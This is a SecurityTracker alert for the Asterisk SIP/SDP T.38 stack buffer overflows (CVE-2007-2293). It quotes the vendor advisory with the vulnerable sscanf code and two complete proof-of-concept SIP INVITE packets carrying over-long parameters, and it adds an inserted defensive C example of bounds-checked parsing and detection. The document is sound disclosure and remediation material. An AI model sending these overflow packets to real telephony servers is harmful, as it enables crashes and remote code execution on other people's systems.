Category:   Application (VoIP)  >   Asterisk
Vendors:   Digium (Linux Support Services)
Asterisk Buffer Overflow in SIP/SDP T.38 Support Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1017951
SecurityTracker URL:  http://securitytracker.com/id/1017951
CVE Reference:   CVE-2007-2293
Updated:  May 12 2008
Original Entry Date:  Apr 25 2007
Impact:   Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 1.4.x prior to 1.4.3
Description:   A vulnerability was reported in Asterisk. A remote user can execute arbitrary code on the target system.

A remote user can send specially crafted T38FaxRateManagement and T38FaxUdpEC SDP parameters to trigger one of two stack overflows in the T.38 SDP parsing code and execute arbitrary code on the target system. The code will run with the privileges of the target service.
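The root cause the vendor advisory quotes further down is an unbounded `sscanf("%s")` that copies an attacker-controlled SDP attribute value into a 256-byte stack array. The C below is an added example and is not Asterisk's code, the project's fix, or part of the advisory: it places the minimal width-limited `sscanf` fix next to a stricter parser that rejects over-long values outright, and adds a scan over an SDP body of the kind a SIP proxy or IDS in front of an unpatched PBX could run. All function names, `T38_VALUE_MAX`, and the embedded SDP samples are assumptions constructed for this example.

```c
#include <stdio.h>
#include <string.h>

/* The advisory's buffer is char s[256]: at most 255 characters plus the NUL. */
#define T38_VALUE_MAX 255

enum t38_parse_result { T38_NOT_T38 = 0, T38_OK = 1, T38_TOO_LONG = 2 };

struct t38_attr {
    const char *name;               /* one of the static names in parse_t38_attr */
    char value[T38_VALUE_MAX + 1];
};

/* Minimal fix for the call quoted in the advisory,
 *     sscanf(a, "T38FaxRateManagement:%s", s);   (no width: overflows s[256])
 * A field width of sizeof(s) - 1 caps what sscanf stores; the rest of an
 * over-long value stays unread instead of being written past the end of s.
 * Hypothetical helper, not the project's own fix. */
static int scan_rate_management_bounded(const char *a, char s[T38_VALUE_MAX + 1])
{
    return sscanf(a, "T38FaxRateManagement:%255s", s) == 1;
}

/* Stricter parser for either T.38 attribute named in the advisory: matches the
 * name exactly, refuses a value that would not fit, and only then copies it.
 * T38_TOO_LONG lets the caller reject the SDP instead of silently truncating. */
static enum t38_parse_result parse_t38_attr(const char *a, struct t38_attr *out)
{
    static const char *const names[] = { "T38FaxRateManagement", "T38FaxUdpEC" };
    for (size_t i = 0; i < sizeof names / sizeof names[0]; i++) {
        size_t n = strlen(names[i]);
        if (strncmp(a, names[i], n) != 0 || a[n] != ':')
            continue;
        const char *v = a + n + 1;
        size_t len = strcspn(v, " \t\r\n");   /* same token boundary %s uses */
        if (len > T38_VALUE_MAX)
            return T38_TOO_LONG;
        out->name = names[i];
        memcpy(out->value, v, len);
        out->value[len] = '\0';
        return T38_OK;
    }
    return T38_NOT_T38;
}

/* Defensive scan over a whole SDP body, as a SIP proxy, SBC or IDS in front of
 * an unpatched PBX could run it: counts "a=" lines whose T.38 value exceeds
 * T38_VALUE_MAX. Lines may end in CRLF or LF. */
static int count_oversized_t38_attrs(const char *sdp)
{
    int oversized = 0;
    for (const char *line = sdp; *line; ) {
        size_t len = strcspn(line, "\n");
        struct t38_attr attr;
        if (len > 2 && line[0] == 'a' && line[1] == '=' &&
            parse_t38_attr(line + 2, &attr) == T38_TOO_LONG)
            oversized++;
        line += len + (line[len] == '\n');
    }
    return oversized;
}

/* Builds "NAME:" followed by value_len 'A's: constructed test input, not the
 * advisory's packet. Returns the length written, or 0 if buf is too small. */
static size_t make_t38_line(char *buf, size_t cap, const char *name, size_t value_len)
{
    size_t n = strlen(name);
    if (n + 1 + value_len + 1 > cap)
        return 0;
    memcpy(buf, name, n);
    buf[n] = ':';
    memset(buf + n + 1, 'A', value_len);
    buf[n + 1 + value_len] = '\0';
    return n + 1 + value_len;
}

/* Constructed, well-formed T.38 SDP body (not taken from the advisory). */
static const char sample_sdp_ok[] =
    "v=0\r\nm=image 5004 UDPTL t38\r\na=T38FaxVersion:0\r\n"
    "a=T38FaxRateManagement:transferredTCF\r\na=T38FaxUdpEC:t38UDPRedundancy\r\n";

int main(void)
{
    char line[600], s[T38_VALUE_MAX + 1];
    struct t38_attr attr;
    make_t38_line(line, sizeof line, "T38FaxRateManagement", 300);
    printf("strict parser on a 300-byte value: %d (2 = rejected)\n", parse_t38_attr(line, &attr));
    printf("bounded sscanf kept %zu bytes, no overflow\n",
           scan_rate_management_bounded(line, s) ? strlen(s) : (size_t)0);
    printf("oversized T.38 attributes in well-formed SDP: %d\n", count_oversized_t38_attrs(sample_sdp_ok));
    return 0;
}
```

The width in the `sscanf` format must be kept in step with the buffer size by hand, which is why the stricter parser is the better long-term shape: it computes the token length first and never writes unless the value fits, and a value longer than 255 bytes is itself a strong signal worth logging, since no conforming T.38 endpoint sends one.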

T.38 support is not enabled by default.

AsteriskNOW and the Asterisk Appliance Developer Kit are affected.

The vendor was notified on March 22, 2007.

Barrie Dempster of NGS Software discovered this vulnerability.

Impact:   A remote user can execute arbitrary code on the target system.
Solution:   The vendor has issued a fixed version (1.4.3), available at:

ftp://ftp.digium.com/pub/telephony/asterisk

For AsteriskNOW, the fix is included in Beta 6.

For the Asterisk Appliance, the fix is included in version 0.4.0.

The Asterisk advisory is available at:

http://www.asterisk.org/files/ASA-2007-010.pdf

Vendor URL:  www.asterisk.org/
Cause:   Boundary error
Underlying OS:   Linux (Any), UNIX (Any)

Message History:   None.


Source Message Contents

Date:  Tue, 24 Apr 2007 18:20:26 -0500
Subject:  [Full-disclosure] ASA-2007-010: Two stack buffer overflows in SIP

>                Asterisk Project Security Advisory - ASA-2007-010
> 
>    +------------------------------------------------------------------------+
>    |      Product       | Asterisk                                          |
>    |--------------------+---------------------------------------------------|
>    |      Summary       | Two stack buffer overflows in SIP channel's T.38  |
>    |                    | SDP parsing code                                  |
>    |--------------------+---------------------------------------------------|
>    | Nature of Advisory | Exploitable Stack Buffer Overflow                 |
>    |--------------------+---------------------------------------------------|
>    |   Susceptibility   | Remote Unauthenticated Sessions                   |
>    |--------------------+---------------------------------------------------|
>    |      Severity      | Moderate                                          |
>    |--------------------+---------------------------------------------------|
>    |   Exploits Known   | No                                                |
>    |--------------------+---------------------------------------------------|
>    |    Reported On     | March 22, 2007                                    |
>    |--------------------+---------------------------------------------------|
>    |    Reported By     | Barrie Dempster, NGS Software,                    |
>    |                    | <barrie@ngssoftware.com>                          |
>    |--------------------+---------------------------------------------------|
>    |     Posted On      | April 24, 2007                                    |
>    |--------------------+---------------------------------------------------|
>    |  Last Updated On   | April 24, 2007                                    |
>    |--------------------+---------------------------------------------------|
>    |  Advisory Contact  | kpfleming@digium.com                              |
>    +------------------------------------------------------------------------+
> 
> +------------------------------------------------------------------------------------+
> |Description|Two closely related stack based buffer overflows exist in the SIP/SDP   |
> |           |handler of Asterisk, the vulnerabilities are very similar but exist as  |
> |           |two separate unsafe function calls. The T38FaxRateManagement and        |
> |           |T38FaxUdpEC SDP parameters can be exploited remotely leading to         |
> |           |arbitrary code execution without authentication. In order for these     |
> |           |overflows to occur, t38 fax over SIP must be enabled in sip.conf.       |
> |           |Examples of SIP INVITE packets are shown below, however these           |
> |           |vulnerabilities can be triggered with a number of different SIP messages|
> |           |affecting calls received by Asterisk, or in response to calls made by   |
> |           |Asterisk.                                                               |
> |           |                                                                        |
> |           |Remote Unauthenticated stack overflow in Asterisk SIP/SDP               |
> |           |T38FaxRateManagement parameter                                          |
> |           |                                                                        |
> |           |A remote unauthenticated stack overflow exists in the SIP/SDP handler of|
> |           |Asterisk. By sending a SIP packet with SDP data which includes an overly|
> |           |long T38 parameter it is possible to overflow a stack based buffer and  |
> |           |execute arbitrary code.                                                 |
> |           |                                                                        |
> |           |The process_sdp function of chan_sip.c in Asterisk contains the         |
> |           |following vulnerable call to sscanf.                                    |
> |           |                                                                        |
> |           |else if ((sscanf(a, "T38FaxRateManagement:%s", s) == 1)) {              |
> |           |                                                                        |
> |           |found = 1;                                                              |
> |           |                                                                        |
> |           |if (option_debug > 2)                                                   |
> |           |                                                                        |
> |           |ast_log(LOG_DEBUG, "RateMangement: %s\n", s);                           |
> |           |                                                                        |
> |           |if (!strcasecmp(s, "localTCF"))                                         |
> |           |                                                                        |
> |           |peert38capability |=                                                    |
> |           |                                                                        |
> |           |T38FAX_RATE_MANAGEMENT_LOCAL_TCF;                                       |
> |           |                                                                        |
> |           |else if (!strcasecmp(s, "transferredTCF"))                              |
> |           |                                                                        |
> |           |peert38capability |=                                                    |
> |           |                                                                        |
> |           |T38FAX_RATE_MANAGEMENT_TRANSFERED_TCF;                                  |
> |           |                                                                        |
> |           |This attempts to read the "T38FaxRateManagement:" option from the SDP   |
> |           |within a SIP packet and copy the succeeding string into "s". There are  |
> |           |no checks on the length of this string and we can therefore write past  |
> |           |the boundaries of the "s" variable overwriting adjacent memory on the   |
> |           |stack. "s" is defined earlier in this function as being a character     |
> |           |array of only 256 bytes. The following example packet demonstrates an   |
> |           |overflow of this parameter:                                             |
> |           |                                                                        |
> |           |INVITE sip:200@127.0.0.1 SIP/2.0                                        |
> |           |                                                                        |
> |           |Date: Wed, 21 Mar 2007 4:20:09 GMT                                      |
> |           |                                                                        |
> |           |CSeq: 1 INVITE                                                          |
> |           |                                                                        |
> |           |Via: SIP/2.0/UDP                                                        |
> |           |                                                                        |
> |           |10.0.0.123:5068;branch=z9hG4bKfe06f452-2dd6-db11-6d02-000b7d0dc672;rport|
> |           |                                                                        |
> |           |User-Agent: NGS/2.0                                                     |
> |           |                                                                        |
> |           |From: "Barrie Dempster"                                                 |
> |           |                                                                        |
> |           |<sip:zeedo@10.0.0.123:5068>;tag=de92d852-2dd6-db11-9d02-000b7d0dc672    |
> |           |                                                                        |
> |           |Call-ID: f897d952-2fa6-db49441-9d02-001b7d0dc672@hades                  |
> |           |                                                                        |
> |           |To: <sip:200@localhost>                                                 |
> |           |                                                                        |
> |           |Contact: <sip:zeedo@10.0.0.123:5068;transport=udp>                      |
> |           |                                                                        |
> |           |Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,NOTIFY,REFER,MESSAGE               |
> |           |                                                                        |
> |           |Content-Type: application/sdp                                           |
> |           |                                                                        |
> |           |Content-Length: 796                                                     |
> |           |                                                                        |
> |           |Max-Forwards: 70                                                        |
> |           |                                                                        |
> |           |v=0                                                                     |
> |           |                                                                        |
> |           |o=rtp 1160124458839569000 160124458839569000 IN IP4 127.0.0.1           |
> |           |                                                                        |
> |           |s=-                                                                     |
> |           |                                                                        |
> |           |c=IN IP4 127.0.0.1                                                      |
> |           |                                                                        |
> |           |t=0 0                                                                   |
> |           |                                                                        |
> |           |m=image 5004 UDPTL t38                                                  |
> |           |                                                                        |
> |           |a=T38FaxVersion:0                                                       |
> |           |                                                                        |
> |           |a=T38MaxBitRate:14400                                                   |
> |           |                                                                        |
> |           |a=T38FaxMaxBuffer:1024                                                  |
> |           |                                                                        |
> |           |a=T38FaxMaxDatagram:238                                                 |
> |           |                                                                        |
> |           |a=T38FaxRateManagement:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA     |
> |           |                                                                        |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA         |
> |           |                                                                        |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA         |
> |           |                                                                        |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA         |
> |           |                                                                        |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA         |
> |           |                                                                        |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA         |
> |           |                                                                        |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA         |
> |           |                                                                        |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA         |
> |           |                                                                        |
> |           |AAAAAAAAAAAAAAAA                                                        |
> |           |                                                                        |
> |           |a=T38FaxUdpEC:t38UDPRedundancy                                          |
> |           |                                                                        |
> |           |-------------------------------------------------                       |
> |           |                                                                        |
> |           |Remote Unauthenticated stack overflow in Asterisk SIP/SDP T38FaxUdpEC   |
> |           |parameter                                                               |
> |           |                                                                        |
> |           |A remote unauthenticated stack overflow exists in the SIP/SDP handler of|
> |           |Asterisk. By sending a SIP packet with SDP data which includes an overly|
> |           |long T38FaxUdpEC parameter it is possible to overflow a stack based     |
> |           |buffer and execute arbitrary code.                                      |
> |           |                                                                        |
> |           |The process_sdp function of chan_sip.c in Asterisk contains the         |
> |           |following vulnerable call to sscanf.                                    |
> |           |                                                                        |
> |           |else if ((sscanf(a, "T38FaxUdpEC:%s", s) == 1)) {                       |
> |           |                                                                        |
> |           |found = 1;                                                              |
> |           |                                                                        |
> |           |if (option_debug > 2)                                                   |
> |           |                                                                        |
> |           |ast_log(LOG_DEBUG, "UDP EC: %s\n", s);                                  |
> |           |                                                                        |
> |           |if (!strcasecmp(s, "t38UDPRedundancy")) {                               |
> |           |                                                                        |
> |           |peert38capability |=                                                    |
> |           |                                                                        |
> |           |T38FAX_UDP_EC_REDUNDANCY;                                               |
> |           |                                                                        |
> |           |ast_udptl_set_error_correction_scheme(p->udptl,                         |
> |           |                                                                        |
> |           |UDPTL_ERROR_CORRECTION_REDUNDANCY);                                     |
> |           |                                                                        |
> |           |This attempts to read the "T38FaxUdpEC:" option from the SDP within a   |
> |           |SIP packet and copy the succeeding string into "s". There are no checks |
> |           |on the length of this string and we can therefore write past the        |
> |           |boundaries of the "s" variable overwriting adjacent memory on the stack.|
> |           |"s" is defined earlier in this function as being a character array of   |
> |           |only 256 bytes. The following example packet demonstrates an overflow of|
> |           |this parameter:                                                         |
> |           |                                                                        |
> |           |INVITE sip:200@127.0.0.1 SIP/2.0                                        |
> |           |                                                                        |
> |           |Date: Wed, 21 Mar 2007 4:20:09 GMT                                      |
> |           |                                                                        |
> |           |CSeq: 1 INVITE                                                          |
> |           |                                                                        |
> |           |Via: SIP/2.0/UDP                                                        |
> |           |                                                                        |
> |           |10.0.0.123:5068;branch=z9hG4bKfe06f452-2dd6-db11-6d02-000b7d0dc672;rport|
> |           |                                                                        |
> |           |User-Agent: NGS/2.0                                                     |
> |           |                                                                        |
> |           |From: "Barrie Dempster"                                                 |
> |           |                                                                        |
> |           |<sip:zeedo@10.0.0.123:5068>;tag=de92d852-2dd6-db11-9d02-000b7d0dc672    |
> |           |                                                                        |
> |           |Call-ID: f897d952-2fa6-db49441-9d02-001b7d0dc672@hades                  |
> |           |                                                                        |
> |           |To: <sip:200@localhost>                                                 |
> |           |                                                                        |
> |           |Contact: <sip:zeedo@10.0.0.123:5068;transport=udp>                      |
> |           |                                                                        |
> |           |Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,NOTIFY,REFER,MESSAGE               |
> |           |                                                                        |
> |           |Content-Type: application/sdp                                           |
> |           |                                                                        |
> |           |Content-Length: 796                                                     |
> |           |                                                                        |
> |           |Max-Forwards: 70                                                        |
> |           |                                                                        |
> |           |v=0                                                                     |
> |           |                                                                        |
> |           |o=rtp 1160124458839569000 160124458839569000 IN IP4 127.0.0.1           |
> |           |                                                                        |
> |           |s=-                                                                     |
> |           |                                                                        |
> |           |c=IN IP4 127.0.0.1                                                      |
> |           |                                                                        |
> |           |t=0 0                                                                   |
> |           |                                                                        |
> |           |m=image 5004 UDPTL t38                                                  |
> |           |                                                                        |
> |           |a=T38FaxVersion:0                                                       |
> |           |                                                                        |
> |           |a=T38MaxBitRate:14400                                                   |
> |           |                                                                        |
> |           |a=T38FaxMaxBuffer:1024                                                  |
> |           |                                                                        |
> |           |a=T38FaxMaxDatagram:238                                                 |
> |           |                                                                        |
> |           |a=T38FaxUdpEC:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA       |
> |           |                                                                        |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA         |
> |           |                                                                        |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA         |
> |           |                                                                        |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA         |
> |           |                                                                        |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA         |
> |           |                                                                        |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA         |
> |           |                                                                        |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA         |
> |           |                                                                        |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA         |
> |           |                                                                        |
> |           |AAAAAAAAA                                                               |
> +------------------------------------------------------------------------------------+
> 
>    +------------------------------------------------------------------------+
>    | Resolution | T.38 support in the affected versions of Asterisk is not  |
>    |            | enabled by default, therefore the severity of this issue  |
>    |            | is 'moderate'.                                            |
>    |            |                                                           |
>    |            | Users who are using the default configuration with        |
>    |            | 't38_udptl' set to 'no' or an equivalent value are not    |
>    |            | susceptible to this vulnerability. Users who have set     |
>    |            | this configuration item to 'yes' or an equivalent value   |
>    |            | but are not actually using T.38 support can set it to     |
>    |            | 'no' to secure their systems against this vulnerability.  |
>    |            |                                                           |
>    |            | All other users are urged to upgrade to the appropriate   |
>    |            | version of their Asterisk product listed in the           |
>    |            | 'Corrected In' section below.                             |
>    +------------------------------------------------------------------------+
> 
>    +------------------------------------------------------------------------+
>    |                           Affected Versions                            |
>    |------------------------------------------------------------------------|
>    |           Product            |   Release   |                           |
>    |                              |   Series    |                           |
>    |------------------------------+-------------+---------------------------|
>    |     Asterisk Open Source     |    1.0.x    | not affected; does not    |
>    |                              |             | contain T.38 support      |
>    |------------------------------+-------------+---------------------------|
>    |     Asterisk Open Source     |    1.2.x    | not affected, does not    |
>    |                              |             | contain T.38 support      |
>    |------------------------------+-------------+---------------------------|
>    |     Asterisk Open Source     |    1.4.x    | all releases prior to     |
>    |                              |             | 1.4.3                     |
>    |------------------------------+-------------+---------------------------|
>    |  Asterisk Business Edition   |    A.x.x    | not affected, does not    |
>    |                              |             | contain T.38 support      |
>    |------------------------------+-------------+---------------------------|
>    |  Asterisk Business Edition   |    B.x.x    | not affected, does not    |
>    |                              |             | contain T.38 support      |
>    |------------------------------+-------------+---------------------------|
>    |         AsteriskNOW          | pre-release | all releases prior to and |
>    |                              |             | including Beta 5          |
>    |------------------------------+-------------+---------------------------|
>    | Asterisk Appliance Developer |    0.x.x    | all releases prior to     |
>    |             Kit              |             | 0.4.0                     |
>    +------------------------------------------------------------------------+
> 
>    +------------------------------------------------------------------------+
>    |                              Corrected In                              |
>    |------------------------------------------------------------------------|
>    |      Product       |                      Release                      |
>    |--------------------+---------------------------------------------------|
>    |   Asterisk Open    |               1.4.3, available from               |
>    |       Source       |    ftp://ftp.digium.com/pub/telephony/asterisk    |
>    |--------------------+---------------------------------------------------|
>    |    AsteriskNOW     |            Beta 6, when available from            |
>    |                    | http://www.asterisknow.org, Beta 5 users can use  |
>    |                    |   'System Update' in the appliance control panel  |
>    |                    |   to update their version of AsteriskNOW          |
>    |--------------------+---------------------------------------------------|
>    | Asterisk Appliance |               0.4.0, available from               |
>    |   Developer Kit    |      ftp://ftp.digium.com/pub/telephony/aadk      |
>    +------------------------------------------------------------------------+
> 
>    +------------------------------------------------------------------------+
>    |        Links         |                                                 |
>    +------------------------------------------------------------------------+
> 
>    +------------------------------------------------------------------------+
>    | Asterisk Project Security Advisories are posted at                     |
>    | http://www.asterisk.org/security.                                      |
>    |                                                                        |
>    | This document may be superseded by later versions; if so, the latest   |
>    | version will be posted at                                              |
>    | http://www.asterisk.org/files/ASA-2007-010.pdf.                        |
>    +------------------------------------------------------------------------+
> 
>                Asterisk Project Security Advisory - ASA-2007-010
>               Copyright (c) 2007 Digium, Inc. All Rights Reserved.
>   Permission is hereby granted to distribute and publish this advisory in its
>                            original, unaltered form.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

 
 

